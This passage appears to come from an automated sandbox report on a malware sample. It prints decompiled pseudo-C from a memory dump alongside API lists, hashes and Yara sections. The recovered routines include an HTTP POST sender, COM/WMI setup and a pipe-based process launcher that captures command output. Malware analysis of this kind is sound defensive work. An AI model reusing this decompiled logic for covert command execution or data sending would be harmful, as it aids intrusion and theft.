				_v104 = 0x100;
				_v80 =  &_v652;
				_push( &_v124);
				_push(0);
				_v76 = 0x100;
				_push(E0008C379(_t214));
				_t113 =  *0x9e6a4; // 0xe7f4f0
				_push(_t214);
				if( *((intOrPtr*)(_t113 + 0x28))() != 0) {
					_t209 = 0;
					_v20 = 0;
					do {
						_t115 =  *0x9e6a4; // 0xe7f4f0
						_v12 = 0x8404f700;
						_t213 =  *_t115( *0x9e788,  *((intOrPtr*)(_t221 + _t209 * 4 - 0x24)), 0, 0, 0);
						if(_t213 != 0) {
							_t195 = 3;
							_t185 = 4;
							_v8 = _t195;
							_t118 =  *0x9e6a4; // 0xe7f4f0
							 *((intOrPtr*)(_t118 + 0x14))(_t213, _t195,  &_v8, _t185);
							_v8 = 0x3a98;
							_t121 =  *0x9e6a4; // 0xe7f4f0
							 *((intOrPtr*)(_t121 + 0x14))(_t213, 2,  &_v8, _t185);
							_v8 = 0x493e0;
							_t124 =  *0x9e6a4; // 0xe7f4f0
							 *((intOrPtr*)(_t124 + 0x14))(_t213, 6,  &_v8, _t185);
							_v8 = 0x493e0;
							_t127 =  *0x9e6a4; // 0xe7f4f0
							 *((intOrPtr*)(_t127 + 0x14))(_t213, 5,  &_v8, _t185);
							_t131 =  *0x9e6a4; // 0xe7f4f0
							_t186 =  *((intOrPtr*)(_t131 + 0x1c))(_t213,  &_v396, _v100, 0, 0, 3, 0, 0);
							if(_a24 != 0) {
								E0008980C(_a24);
							}
							if(_t186 != 0) {
								_t133 = 0x8484f700;
								if(_v112 != 4) {
									_t133 = _v12;
								}
								_t136 =  *0x9e6a4; // 0xe7f4f0
								_t216 =  *((intOrPtr*)(_t136 + 0x20))(_t186, "POST",  &_v652, 0, 0,  &_v64, _t133, 0);
								_v8 = _t216;
								if(_a24 != 0) {
									E0008980C(_a24);
								}
								if(_t216 != 0) {
									_t138 = 4;
									if(_v112 != _t138) {
										L19:
										_t139 = E000895C7(0x777);
										_t217 = _t139;
										_v12 = _t217;
										_t141 =  *0x9e6a4; // 0xe7f4f0
										_t218 = _v8;
										_v28 =  *((intOrPtr*)(_t141 + 0x24))(_t218, _t217, E0008C379(_t217), _a4, _a8);
										E000885C2( &_v12);
										if(_a24 != 0) {
											E0008980C(_a24);
										}
										if(_v28 != 0) {
											L28:
											_v24 = 8;
											_push(0);
											_v32 = 0;
											_v28 = 0;
											_push( &_v24);
											_push( &_v32);
											_t147 =  *0x9e6a4; // 0xe7f4f0
											_push(0x13);
											_push(_t218);
											if( *((intOrPtr*)(_t147 + 0xc))() != 0) {
												_t219 = E00089749( &_v32);
												if(_t219 == 0xc8) {
													 *_a20 = _v8;
													 *_a12 = _t213;
													 *_a16 = _t186;
													return 0;
												}
												_t220 =  ~_t219;
												L32:
												_t154 =  *0x9e6a4; // 0xe7f4f0
												 *((intOrPtr*)(_t154 + 8))(_v8);
												L33:
												if(_t186 != 0) {
													_t158 =  *0x9e6a4; // 0xe7f4f0
													 *((intOrPtr*)(_t158 + 8))(_t186);
												}
												if(_t213 != 0) {
													_t203 =  *0x9e6a4; // 0xe7f4f0
													 *((intOrPtr*)(_t203 + 8))(_t213);
												}
												return _t220;
											}
											GetLastError();
											_t220 = 0xfffffff8;
											goto L32;
										} else {
											GetLastError();
											_t162 =  *0x9e6a4; // 0xe7f4f0
											 *((intOrPtr*)(_t162 + 8))(_t218);
											_t218 = 0;
											goto L23;
										}
									}
									_v12 = _t138;
									_push( &_v12);
									_push( &_v16);
									_t172 =  *0x9e6a4; // 0xe7f4f0
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t172 + 0x18))() == 0) {
										L18:
										GetLastError();
										goto L19;
									}
									_v16 = _v16 | 0x00003380;
									_push(4);
									_push( &_v16);
									_t176 =  *0x9e6a4; // 0xe7f4f0
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t176 + 0x14))() != 0) {
										goto L19;
									}
									goto L18;
								} else {
									GetLastError();
									L23:
									_t164 =  *0x9e6a4; // 0xe7f4f0
									 *((intOrPtr*)(_t164 + 8))(_t186);
									_t186 = 0;
									goto L24;
								}
							} else {
								GetLastError();
								L24:
								_t166 =  *0x9e6a4; // 0xe7f4f0
								 *((intOrPtr*)(_t166 + 8))(_t213);
								_t213 = 0;
								goto L25;
							}
						}
						GetLastError();
						L25:
						_t204 = _t218;
						_t209 = _v20 + 1;
						_v20 = _t209;
					} while (_t209 < 2);
					_v8 = _t218;
					if(_t204 != 0) {
						goto L28;
					}
					_t220 = 0xfffffffe;
					goto L33;
				}
				_t183 = 0xfffffffc;
				return _t183;
			}

0x0008e671
0x0008e683
0x0008e68c
0x0008e696
0x0008e69a
0x0008e6ab
0x0008e6c2
0x0008e6cf
0x0008e6dc
0x0008e6e9
0x0008e6ec
0x0008e6f1
0x0008e6f6
0x0008e6f8
0x0008e700
0x0008e70b
0x0008e712
0x0008e71e
0x0008e721
0x0008e72f
0x0008e732
0x0008e738
0x0008e739
0x0008e73b
0x0008e744
0x0008e745
0x0008e74a
0x0008e750
0x0008e75a
0x0008e75c
0x0008e761
0x0008e761
0x0008e770
0x0008e77f
0x0008e783
0x0008e792
0x0008e795
0x0008e79a
0x0008e79e
0x0008e7a5
0x0008e7ac
0x0008e7b4
0x0008e7bc
0x0008e7c3
0x0008e7cb
0x0008e7d3
0x0008e7da
0x0008e7e2
0x0008e7ea
0x0008e7ff
0x0008e80c
0x0008e80e
0x0008e813
0x0008e813
0x0008e81a
0x0008e82b
0x0008e830
0x0008e832
0x0008e832
0x0008e846
0x0008e858
0x0008e85a
0x0008e85d
0x0008e862
0x0008e862
0x0008e869
0x0008e878
0x0008e87c
0x0008e8ba
0x0008e8bf
0x0008e8c7
0x0008e8cc
0x0008e8d7
0x0008e8dd
0x0008e8e7
0x0008e8ea
0x0008e8f3
0x0008e8f8
0x0008e8f8
0x0008e901
0x0008e94a
0x0008e94c
0x0008e953
0x0008e954
0x0008e957
0x0008e95d
0x0008e961
0x0008e962
0x0008e967
0x0008e969
0x0008e96f
0x0008e984
0x0008e98c
0x0008e9c1
0x0008e9c6
0x0008e9cb
0x00000000
0x0008e9cd
0x0008e98e
0x0008e990
0x0008e990
0x0008e999
0x0008e99c
0x0008e99e
0x0008e9a0
0x0008e9a6
0x0008e9a6
0x0008e9ab
0x0008e9ad
0x0008e9b4
0x0008e9b4
0x00000000
0x0008e9b7
0x0008e971
0x0008e979
0x00000000
0x0008e903
0x0008e903
0x0008e909
0x0008e90f
0x0008e912
0x00000000
0x0008e912
0x0008e901
0x0008e87e
0x0008e884
0x0008e888
0x0008e889
0x0008e88e
0x0008e890
0x0008e896
0x0008e8b4
0x0008e8b4
0x00000000
0x0008e8b4
0x0008e898
0x0008e8a2
0x0008e8a4
0x0008e8a5
0x0008e8aa
0x0008e8ac
0x0008e8b2
0x00000000
0x00000000
0x00000000
0x0008e86b
0x0008e86b
0x0008e914
0x0008e914
0x0008e91a
0x0008e91d
0x00000000
0x0008e91d
0x0008e81c
0x0008e81c
0x0008e91f
0x0008e91f
0x0008e925
0x0008e928
0x00000000
0x0008e928
0x0008e81a
0x0008e785
0x0008e92a
0x0008e92d
0x0008e92f
0x0008e932
0x0008e935
0x0008e93e
0x0008e943
0x00000000
0x00000000
0x0008e947
0x00000000
0x0008e947
0x0008e754
0x00000000

APIs

memset.MSVCRT ref: 0008E69A
memset.MSVCRT ref: 0008E6AB
memset.MSVCRT ref: 0008E700
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,000007D0,00000000), ref: 0008E785

Strings

POST, xrefs: 0008E84B

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: memset$ErrorLast
String ID: POST
API String ID: 2570506013-1814004025
Opcode ID: 367a7a72f7db2160077767910a4473ccd00a1e93e961edb2d3cd1ed941d500fc
Instruction ID: ea6434b96816f391ca67125378d8c048189af0a816e14d9e93347baa296bf716
Opcode Fuzzy Hash: 367a7a72f7db2160077767910a4473ccd00a1e93e961edb2d3cd1ed941d500fc
Instruction Fuzzy Hash: 50B13C71900208AFEB55EFA4DC89EAE7BB8FF58310F10406AF545EB291DB749E44CB61

Uniqueness

Uniqueness Score: -1.00%

Function 000916B8, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 70
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 28%

			E000916B8(signed int* _a4) {
				char _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				char _v20;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t17;
				void* _t22;
				intOrPtr* _t28;
				signed int _t29;
				signed int _t30;
				struct HINSTANCE__* _t32;
				void* _t34;

				_t30 = 0;
				_v8 = 0;
				_t32 = GetModuleHandleA("advapi32.dll");
				if(_t32 == 0) {
					L9:
					return 1;
				}
				_t16 = GetProcAddress(_t32, "CryptAcquireContextA");
				_v12 = _t16;
				if(_t16 == 0) {
					goto L9;
				}
				_t17 = GetProcAddress(_t32, "CryptGenRandom");
				_v16 = _t17;
				if(_t17 == 0) {
					goto L9;
				}
				_t28 = GetProcAddress(_t32, "CryptReleaseContext");
				if(_t28 == 0) {
					goto L9;
				}
				_push(0xf0000000);
				_push(1);
				_push(0);
				_push(0);
				_push( &_v8);
				if(_v12() == 0) {
					goto L9;
				}
				_t22 = _v16(_v8, 4,  &_v20);
				 *_t28(_v8, 0);
				if(_t22 == 0) {
					goto L9;
				}
				_t29 = 0;
				do {
					_t30 = _t30 << 0x00000008 |  *(_t34 + _t29 - 0x10) & 0x000000ff;
					_t29 = _t29 + 1;
				} while (_t29 < 4);
				 *_a4 = _t30;
				return 0;
			}

0x000916c1
0x000916c8
0x000916d1
0x000916d5
0x00091750
0x00000000
0x00091752
0x000916e3
0x000916e5
0x000916ea
0x00000000
0x00000000
0x000916f2
0x000916f4
0x000916f9
0x00000000
0x00000000
0x00091703
0x00091707
0x00000000
0x00000000
0x00091709
0x0009170e
0x00091710
0x00091711
0x00091715
0x0009171b
0x00000000
0x00000000
0x00091726
0x0009172f
0x00091733
0x00000000
0x00000000
0x00091735
0x00091737
0x0009173f
0x00091741
0x00091742
0x0009174a
0x00000000

APIs

GetModuleHandleA.KERNEL32(advapi32.dll,00000000,00000000,00000000,0008765A,?,?,00000000,?), ref: 000916CB
GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,00000000,?), ref: 000916E3
GetProcAddress.KERNEL32(00000000,CryptGenRandom,?,?,00000000,?), ref: 000916F2
GetProcAddress.KERNEL32(00000000,CryptReleaseContext,?,?,00000000,?), ref: 00091701

Strings

advapi32.dll, xrefs: 000916C3
CryptAcquireContextA, xrefs: 000916DD
CryptGenRandom, xrefs: 000916EC
CryptReleaseContext, xrefs: 000916FB

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
API String ID: 667068680-129414566
Opcode ID: 27f9b75c89bbff0010089760dc2ea391a5fe869bbdee21b5a79a33e181e9a0cc
Instruction ID: f7ee788a374f61118607f953ef7ffa495e5dc05b0280f9c56cf14542586de261
Opcode Fuzzy Hash: 27f9b75c89bbff0010089760dc2ea391a5fe869bbdee21b5a79a33e181e9a0cc
Instruction Fuzzy Hash: B5117731B046177BDF515BEA8C84EEFBBF9AF46780B044065FA15F6240DA70D901A764

Uniqueness

Uniqueness Score: -1.00%

Function 00092122, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 98
stringCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00092122(char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
				signed int _t12;
				signed int _t13;
				int _t15;
				char* _t24;
				char* _t26;
				char* _t28;
				char* _t29;
				signed int _t40;
				char* _t43;
				char* _t45;
				long long* _t47;

				_t12 = _a20;
				if(_t12 == 0) {
					_t12 = 0x11;
				}
				_t26 = _a4;
				_push(_t30);
				 *_t47 = _a12;
				_push(_t12);
				_push("%.*g");
				_push(_a8);
				_push(_t26);
				L00092285();
				_t40 = _t12;
				if(_t40 < 0 || _t40 >= _a8) {
					L19:
					_t13 = _t12 | 0xffffffff;
					goto L20;
				} else {
					L000922CD();
					_t15 =  *((intOrPtr*)( *_t12));
					if(_t15 != 0x2e) {
						_t24 = strchr(_t26, _t15);
						if(_t24 != 0) {
							 *_t24 = 0x2e;
						}
					}
					if(strchr(_t26, 0x2e) != 0 || strchr(_t26, 0x65) != 0) {
						L11:
						_t43 = strchr(_t26, 0x65);
						_t28 = _t43;
						if(_t43 == 0) {
							L18:
							_t13 = _t40;
							L20:
							return _t13;
						}
						_t45 = _t43 + 1;
						_t29 = _t28 + 2;
						if( *_t45 == 0x2d) {
							_t45 = _t29;
						}
						while( *_t29 == 0x30) {
							_t29 = _t29 + 1;
						}
						if(_t29 != _t45) {
							E00088706(_t45, _t29, _t40 - _t29 + _a4);
							_t40 = _t40 + _t45 - _t29;
						}
						goto L18;
					} else {
						_t6 = _t40 + 3; // 0x909b2
						_t12 = _t6;
						if(_t12 >= _a8) {
							goto L19;
						}
						_t26[_t40] = 0x302e;
						( &(_t26[2]))[_t40] = 0;
						_t40 = _t40 + 2;
						goto L11;
					}
				}
			}

0x00092125
0x0009212a
0x0009212e
0x0009212e
0x00092133
0x00092138
0x00092139
0x0009213c
0x0009213d
0x00092142
0x00092145
0x00092146
0x0009214b
0x00092152
0x000921f8
0x000921f8
0x00000000
0x00092161
0x00092161
0x00092168
0x0009216c
0x00092173
0x0009217c
0x0009217e
0x0009217e
0x0009217c
0x0009218d
0x000921b3
0x000921bc
0x000921be
0x000921c4
0x000921f3
0x000921f3
0x000921fb
0x000921fe
0x000921fe
0x000921c6
0x000921c7
0x000921cd
0x000921cf
0x000921cf
0x000921d4
0x000921d3
0x000921d3
0x000921db
0x000921e7
0x000921f1
0x000921f1
0x00000000
0x0009219d
0x0009219d
0x0009219d
0x000921a3
0x00000000
0x00000000
0x000921a5
0x000921ab
0x000921b0
0x00000000
0x000921b0
0x0009218d

APIs

_snprintf.MSVCRT ref: 00092146
localeconv.MSVCRT ref: 00092161
strchr.MSVCRT ref: 00092173
strchr.MSVCRT ref: 00092184
strchr.MSVCRT ref: 00092192
strchr.MSVCRT ref: 000921B7

Strings

%.*g, xrefs: 0009213D

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: strchr$_snprintflocaleconv
String ID: %.*g
API String ID: 1910550357-952554281
Opcode ID: ce2afa961fa85e74440034e363737a64cfa4b0764273ec5c58c06da3881b6a43
Instruction ID: 1807b53470dfa9210b137be6f10a1510799a81b613ee7934cd0fe15d2e85ebbb
Opcode Fuzzy Hash: ce2afa961fa85e74440034e363737a64cfa4b0764273ec5c58c06da3881b6a43
Instruction Fuzzy Hash: 8E216A766047427ADF259A28DCC6BEA3BDCDF25330F150155FE509A182EA74EC60B3A0

Uniqueness

Uniqueness Score: -1.00%

Function 000902B2, Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 445COMMON

Download Yara Rule

APIs

_snprintf.MSVCRT ref: 00090332
qsort.MSVCRT ref: 000905B0

Strings

true, xrefs: 00090309
null, xrefs: 000902F7
false, xrefs: 00090315
%I64d, xrefs: 00090324

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: _snprintfqsort
String ID: %I64d$false$null$true
API String ID: 756996078-4285102228
Opcode ID: c3656f1e48f6528892983799641ac3336606c700c83bb0b62e38ba968db40f99
Instruction ID: e8f87335b98eb15e4b72e6aadc3c6444a94586e470a32963d335527edd021b66
Opcode Fuzzy Hash: c3656f1e48f6528892983799641ac3336606c700c83bb0b62e38ba968db40f99
Instruction Fuzzy Hash: F1E17DB190020ABFDF119F64CC46EEF3BA9EF55384F108019FE1596152EB31DA61EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0008D748, Relevance: 9.1, APIs: 6, Instructions: 87memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 0008D75C
SysAllocString.OLEAUT32(?), ref: 0008D764
SysAllocString.OLEAUT32(00000000), ref: 0008D778
SysFreeString.OLEAUT32(?), ref: 0008D7F3
SysFreeString.OLEAUT32(?), ref: 0008D7F6
SysFreeString.OLEAUT32(?), ref: 0008D7FB

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 0ae35b3864b79a2002ceb2acc07a6214e28e9f75c0e65d5a7fc5e6ecf6b65d72
Instruction ID: a89b29efd16a02d44f6d8e25ac1661f5a2b1d21aaf5940480051179919990030
Opcode Fuzzy Hash: 0ae35b3864b79a2002ceb2acc07a6214e28e9f75c0e65d5a7fc5e6ecf6b65d72
Instruction Fuzzy Hash: 1821F975900218AFDB10EFA5CC88DAFBBBDFF48654B10449AF505E7250DA71AE01CB60

Uniqueness

Uniqueness Score: -1.00%

Function 000907F7, Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 158COMMON

Download Yara Rule

Strings

@, xrefs: 00090865
\u%04X\u%04X, xrefs: 00090950
\u%04X, xrefs: 00090911

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID:
String ID: @$\u%04X$\u%04X\u%04X
API String ID: 0-2132903582
Opcode ID: ad3677773898463b826370865ef61fb4a1262acb6dcbc071cab37c5794fd638b
Instruction ID: fcde36fe93850f7dd9ad1ae31ae76e92f94782fe824cdb2d7e9ac6baa3171ba9
Opcode Fuzzy Hash: ad3677773898463b826370865ef61fb4a1262acb6dcbc071cab37c5794fd638b
Instruction Fuzzy Hash: C6411931700205EFEF784A9CCD9ABBF2AA8DF45340F244125F986D6396DA61CD91B3D1

Uniqueness

Uniqueness Score: -1.00%

Function 0008D523, Relevance: 7.6, APIs: 5, Instructions: 87
commemoryCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E0008D523(void* __ecx) {
				char _v8;
				void* _v12;
				char* _t15;
				intOrPtr* _t16;
				void* _t21;
				intOrPtr* _t23;
				intOrPtr* _t24;
				intOrPtr* _t25;
				void* _t30;
				void* _t33;

				_v12 = 0;
				_v8 = 0;
				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
				_t15 =  &_v12;
				__imp__CoCreateInstance(0x9b848, 0, 1, 0x9b858, _t15);
				if(_t15 < 0) {
					L5:
					_t23 = _v8;
					if(_t23 != 0) {
						 *((intOrPtr*)( *_t23 + 8))(_t23);
					}
					_t24 = _v12;
					if(_t24 != 0) {
						 *((intOrPtr*)( *_t24 + 8))(_t24);
					}
					_t16 = 0;
				} else {
					__imp__#2(__ecx);
					_t25 = _v12;
					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
					if(_t21 < 0) {
						goto L5;
					} else {
						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
						if(_t21 < 0) {
							goto L5;
						} else {
							_t16 = E00088604(8);
							if(_t16 == 0) {
								goto L5;
							} else {
								 *((intOrPtr*)(_t16 + 4)) = _v12;
								 *_t16 = _v8;
							}
						}
					}
				}
				return _t16;
			}

0x0008d530
0x0008d533
0x0008d536
0x0008d547
0x0008d54d
0x0008d55e
0x0008d566
0x0008d5b7
0x0008d5b7
0x0008d5bc
0x0008d5c1
0x0008d5c1
0x0008d5c4
0x0008d5c9
0x0008d5ce
0x0008d5ce
0x0008d5d1
0x0008d568
0x0008d569
0x0008d56f
0x0008d580
0x0008d585
0x00000000
0x0008d587
0x0008d594
0x0008d59c
0x00000000
0x0008d59e
0x0008d5a0
0x0008d5a8
0x00000000
0x0008d5aa
0x0008d5ad
0x0008d5b3
0x0008d5b3
0x0008d5a8
0x0008d59c
0x0008d585
0x0008d5d6

APIs

CoInitializeEx.OLE32(00000000,00000000), ref: 0008D536
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0008D547
CoCreateInstance.OLE32(0009B848,00000000,00000001,0009B858,?), ref: 0008D55E
SysAllocString.OLEAUT32(00000000), ref: 0008D569
CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0008D594

Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
String ID:
API String ID: 1610782348-0
Opcode ID: 10b5e74f8a59f27958c0d6474d468863946cdabe288dbe1f51fb48886bb044ac
Instruction ID: 5ca9e363416111ca0ccf9453dcb24a0453d396344b9ddfdbf921160754929c58
Opcode Fuzzy Hash: 10b5e74f8a59f27958c0d6474d468863946cdabe288dbe1f51fb48886bb044ac
Instruction Fuzzy Hash: 6F21E970600245BBEB249B66DC4DE6FBFBCFFC6B25F10415EB541A62A0DA709A01CB30

Uniqueness

Uniqueness Score: -1.00%

Function 000921FF, Relevance: 7.6, APIs: 5, Instructions: 52
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E000921FF(char* __eax, char** _a4, long long* _a8) {
				char* _v8;
				long long _v16;
				char* _t9;
				signed char _t11;
				char** _t19;
				char _t22;
				long long _t32;
				long long _t33;

				_t9 = __eax;
				L000922CD();
				_t19 = _a4;
				_t22 =  *__eax;
				if( *_t22 != 0x2e) {
					_t9 = strchr( *_t19, 0x2e);
					if(_t9 != 0) {
						 *_t9 =  *_t22;
					}
				}
				L00092291();
				 *_t9 =  *_t9 & 0x00000000;
				_t11 = strtod( *_t19,  &_v8);
				asm("fst qword [ebp-0xc]");
				_t32 =  *0x98250;
				asm("fucomp st1");
				asm("fnstsw ax");
				if((_t11 & 0x00000044) != 0) {
					L5:
					st0 = _t32;
					L00092291();
					if( *_t11 != 0x22) {
						_t33 = _v16;
						goto L8;
					} else {
						return _t11 | 0xffffffff;
					}
				} else {
					_t33 =  *0x98258;
					asm("fucomp st1");
					asm("fnstsw ax");
					if((_t11 & 0x00000044) != 0) {
						L8:
						 *_a8 = _t33;
						return 0;
					} else {
						goto L5;
					}
				}
			}

0x000921ff
0x00092207
0x0009220c
0x0009220f
0x00092214
0x0009221a
0x00092223
0x00092227
0x00092227
0x00092223
0x00092229
0x0009222e
0x00092237
0x0009223c
0x0009223f
0x00092248
0x0009224a
0x00092251
0x00092262
0x00092262
0x00092264
0x0009226c
0x00092273
0x00000000
0x0009226e
0x00092272
0x00092272
0x00092253
0x00092253
0x00092259
0x0009225b
0x00092260
0x00092276
0x00092279
0x0009227e
0x00000000
0x00000000
0x00000000
0x00092260

APIs

localeconv.MSVCRT ref: 00092207
strchr.MSVCRT ref: 0009221A
_errno.MSVCRT ref: 00092229
strtod.MSVCRT ref: 00092237
_errno.MSVCRT ref: 00092264

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: _errno$localeconvstrchrstrtod
String ID:
API String ID: 1035490122-0
Opcode ID: de4c433de47fb25370494944294a547a5aa963e4291e7017832a2afbf295a471
Instruction ID: 9be57ecffa989f7d2828815fae2d17a9d7f4e019258d81125002a8d3572c8328
Opcode Fuzzy Hash: de4c433de47fb25370494944294a547a5aa963e4291e7017832a2afbf295a471
Instruction Fuzzy Hash: 7701F239904205FADF127F24E9057DD7BA8AF4B360F2041D1E9D0A61E2DB759854E7A0

Uniqueness

Uniqueness Score: -1.00%

Function 0008A9B7, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 177
pipeCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E0008A9B7(signed int __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				signed int _v24;
				char _v28;
				char _v32;
				char _v36;
				struct _SECURITY_ATTRIBUTES _v48;
				intOrPtr _v60;
				char _v64;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				short _v92;
				intOrPtr _v96;
				void _v140;
				intOrPtr _t77;
				void* _t79;
				intOrPtr _t85;
				intOrPtr _t87;
				intOrPtr _t89;
				intOrPtr _t92;
				intOrPtr _t98;
				intOrPtr _t100;
				intOrPtr _t102;
				long _t111;
				intOrPtr _t115;
				intOrPtr _t126;
				void* _t127;
				void* _t128;
				void* _t129;
				void* _t130;

				_t111 = 0;
				_v24 = __ecx;
				_v12 = 0;
				_v20 = 0;
				_t127 = 0;
				_v8 = 0;
				_v16 = 0;
				_v48.nLength = 0xc;
				_v48.lpSecurityDescriptor = 0;
				_v48.bInheritHandle = 1;
				_v28 = 0;
				memset( &_v140, 0, 0x44);
				asm("stosd");
				_t130 = _t129 + 0xc;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				if(CreatePipe( &_v12,  &_v20,  &_v48, 0) == 0) {
					L18:
					return 0;
				}
				if(CreatePipe( &_v8,  &_v16,  &_v48, 0) == 0) {
					L13:
					E0008861A( &_v28, 0);
					if(_v20 != 0) {
						_t77 =  *0x9e684; // 0xe9f8f0
						 *((intOrPtr*)(_t77 + 0x30))(_v20);
					}
					if(_v8 != 0) {
						_t115 =  *0x9e684; // 0xe9f8f0
						 *((intOrPtr*)(_t115 + 0x30))(_v8);
					}
					return _t111;
				}
				_t79 = _v16;
				_v76 = _t79;
				_v80 = _t79;
				_v84 = _v12;
				_v140 = 0x44;
				_v96 = 0x101;
				_v92 = 0;
				_t126 = E00088604(0x1001);
				_v28 = _t126;
				if(_t126 == 0) {
					goto L18;
				}
				_push( &_v64);
				_push( &_v140);
				_t85 =  *0x9e684; // 0xe9f8f0
				_push(0);
				_push(0);
				_push(0x8000000);
				_push(1);
				_push(0);
				_push(0);
				_push(_v24);
				_push(0);
				if( *((intOrPtr*)(_t85 + 0x38))() == 0) {
					goto L13;
				}
				_t87 =  *0x9e684; // 0xe9f8f0
				 *((intOrPtr*)(_t87 + 0x30))(_v12);
				_t89 =  *0x9e684; // 0xe9f8f0
				 *((intOrPtr*)(_t89 + 0x30))(_v16);
				_v24 = _v24 & 0;
				do {
					_t92 =  *0x9e684; // 0xe9f8f0
					_v36 =  *((intOrPtr*)(_t92 + 0x88))(_v8, _t126, 0x1000,  &_v24, 0);
					 *((char*)(_v24 + _t126)) = 0;
					if(_t111 == 0) {
						_t127 = E000891A6(_t126, 0);
					} else {
						_push(0);
						_push(_t126);
						_v32 = _t127;
						_t127 = E00089292(_t127);
						E0008861A( &_v32, 0xffffffff);
						_t130 = _t130 + 0x14;
					}
					_t111 = _t127;
					_v32 = _t127;
				} while (_v36 != 0);
				_push( &_v36);
				_push(E0008C379(_t127));
				_t98 =  *0x9e68c; // 0xe9fab8
				_push(_t127);
				if( *((intOrPtr*)(_t98 + 0xb8))() != 0) {
					L12:
					_t100 =  *0x9e684; // 0xe9f8f0
					 *((intOrPtr*)(_t100 + 0x30))(_v64);
					_t102 =  *0x9e684; // 0xe9f8f0
					 *((intOrPtr*)(_t102 + 0x30))(_v60);
					goto L13;
				}
				_t128 = E00089256(_t127);
				if(_t128 == 0) {
					goto L12;
				}
				E0008861A( &_v32, 0);
				return _t128;
			}

0x0008a9c2
0x0008a9c4
0x0008a9d0
0x0008a9d5
0x0008a9d8
0x0008a9da
0x0008a9dd
0x0008a9e0
0x0008a9e7
0x0008a9ea
0x0008a9f1
0x0008a9f4
0x0008a9fe
0x0008a9ff
0x0008aa02
0x0008aa04
0x0008aa05
0x0008aa1c
0x0008ab9c
0x00000000
0x0008ab9c
0x0008aa33
0x0008ab68
0x0008ab6e
0x0008ab79
0x0008ab7b
0x0008ab83
0x0008ab83
0x0008ab8a
0x0008ab8c
0x0008ab95
0x0008ab95
0x00000000
0x0008ab98
0x0008aa39
0x0008aa3c
0x0008aa3f
0x0008aa45
0x0008aa4f
0x0008aa59
0x0008aa60
0x0008aa69
0x0008aa6b
0x0008aa71
0x00000000
0x00000000
0x0008aa7c
0x0008aa83
0x0008aa84
0x0008aa89
0x0008aa8a
0x0008aa8b
0x0008aa90
0x0008aa92
0x0008aa93
0x0008aa94
0x0008aa97
0x0008aa9d
0x00000000
0x00000000
0x0008aaa3
0x0008aaab
0x0008aaae
0x0008aab6
0x0008aab9
0x0008aabc
0x0008aac2
0x0008aad6
0x0008aadc
0x0008aae2
0x0008ab0b
0x0008aae4
0x0008aae4
0x0008aae6
0x0008aae8
0x0008aaf0
0x0008aaf8
0x0008aafd
0x0008aafd
0x0008ab11
0x0008ab13
0x0008ab13
0x0008ab1b
0x0008ab23
0x0008ab24
0x0008ab29
0x0008ab32
0x0008ab52
0x0008ab52
0x0008ab5a
0x0008ab5d
0x0008ab65
0x00000000
0x0008ab65
0x0008ab3b
0x0008ab3f
0x00000000
0x00000000
0x0008ab47
0x00000000

APIs

memset.MSVCRT ref: 0008A9F4
CreatePipe.KERNEL32(?,?,0000000C,00000000,00000000,00000000,00000000), ref: 0008AA18
CreatePipe.KERNEL32(000865A9,?,0000000C,00000000), ref: 0008AA2F

